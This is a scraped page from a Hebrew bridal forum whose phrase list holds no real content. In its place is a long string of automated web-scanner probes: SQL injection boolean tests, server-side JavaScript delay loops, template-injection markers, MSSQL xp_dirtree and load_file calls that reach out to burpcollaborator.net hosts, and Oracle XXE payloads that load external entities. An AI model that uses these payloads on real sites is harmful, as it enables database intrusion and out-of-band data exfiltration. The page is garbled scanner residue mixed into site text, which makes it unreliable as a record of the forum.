פורום כלות

}}b7938'/"<ce2ce    ' (function(){if(typeof c983c==="undefined"){var a=new Date();do{var b=new Date();}while(b-a<20000);c983c=1;}}()) '    ' and 7509=7510--    ' and 7509=7509--    ' and '7509'='7510    ' and '7509'='7509    17607214' or 9050=9051--    17607214' or 9050=9050--    17607214' or '9050'='9051    17607214' or '9050'='9050    ' (function(){if(typeof debc4==="undefined"){var a=new Date();do{var b=new Date();}while(b-a<20000);debc4=1;}}()) '    ' and 953=954--    ' and 953=953--    ' and '953'='954    ' and '953'='953    44284837' or 3760=3761--    44284837' or 3760=3760--    44284837' or '3760'='3761    44284837' or '3760'='3760    ' (select load_file('\\ysunxapwd1ty0yjyxwhvywrsyj4k781wszgu3lra.burpcollaborator.net\qia')) '    ');exec master.dbo.xp_dirtree '\nkbcpzhl5qlnsnbnpl9kqljhq8w9zxtlke89v0jp.burpcollaborator.netqgq'--    );exec master.dbo.xp_dirtree '\l4qa9x1jpo5lclvl9jtiaj3fa6g7jvdj4bs6fx3m.burpcollaborator.netpzf'--    ';exec master.dbo.xp_dirtree '\rpkgu3mpauqrxrgrupeovpolvc1d41yppgdb02or.burpcollaborator.netdav'--    ;exec master.dbo.xp_dirtree '\g7o5cs4esj8gfgygcewdde6ad1j2mqge74vziq6f.burpcollaborator.netwgq'--    '||(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % hbqzd SYSTEM "http://p6web13nrs7pepxpbnvmcn5jcaiblzfnjbey5mu.burpcollaborator.net/">%hbqzd;]>'),'/l') from dual)||'    e69a1%>f6e8d'/"<e4b9a    %}e3f05'/"<d25fd    }}e850c'/"<b707a    ' (select load_file('\\dl22qpib6gmdtdcdqbaarbk7ryx0oohc8fwaj17q.burpcollaborator.net\xwa')) '    ');exec master.dbo.xp_dirtree '\9lvyqli76cm9t9c9q7a6r7k3ruxwokh881wwjn7c.burpcollaborator.netfzm'--    );exec master.dbo.xp_dirtree '\uxvj26usixyu5uou2smr3swo3f9h05ttkl8gv7jw.burpcollaborator.netqru'--    ';exec master.dbo.xp_dirtree '\hwh61ttfhkxh4hnh1fle2fvb2284zssgj772utii.burpcollaborator.netmgw'--    ;exec master.dbo.xp_dirtree '\x75mc94vs08xfxyxcvwudv6rdijka83wumih58tx.burpcollaborator.netavb'--    '||(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % vvyzk SYSTEM "http://h2k67tzfnk3hahth7fre8f1b82e45syg24xrofd.burpcollaborator.net/">%vvyzk;]>'),'/l') from dual)||'    d0eeb%>a470b'/"<ccbaa    %}b0efd'/"<ee102    }}ddf5e'/"<ce59e    ' (function(){if(typeof a1faf==="undefined"){var a=new Date();do{var b=new Date();}while(b-a<20000);a1faf=1;}}()) '    ' and 9505=9506--    ' and 9505=9505--    ' and '9505'='9506    ' and '9505'='9505    16517222' or 6697=6698--    ' (function(){if(typeof e3e5a==="undefined"){var a=new Date();do{var b=new Date();}while(b-a<20000);e3e5a=1;}}()) '    16517222' or 6697=6697--    16517222' or '6697'='6698    ' and 4831=4832--    ' and 4831=4831--    16517222' or '6697'='6697    ' and '4831'='4832   
עוד ביטויים

כל הזכויות שמורות kala4kala.co.il
פיתוח: LotemX בניית אתרים ובניית רשת חברתית | עיצוב: 2pm
נכנסת להריון? מזל טוב! כנסי לאמא4אמא ותמצאי שם הכל החל ממחשבון הריון , פורום הריון , עגלות לתינוק , סלקלים ועוד זמן טעינה: 0.066 שניות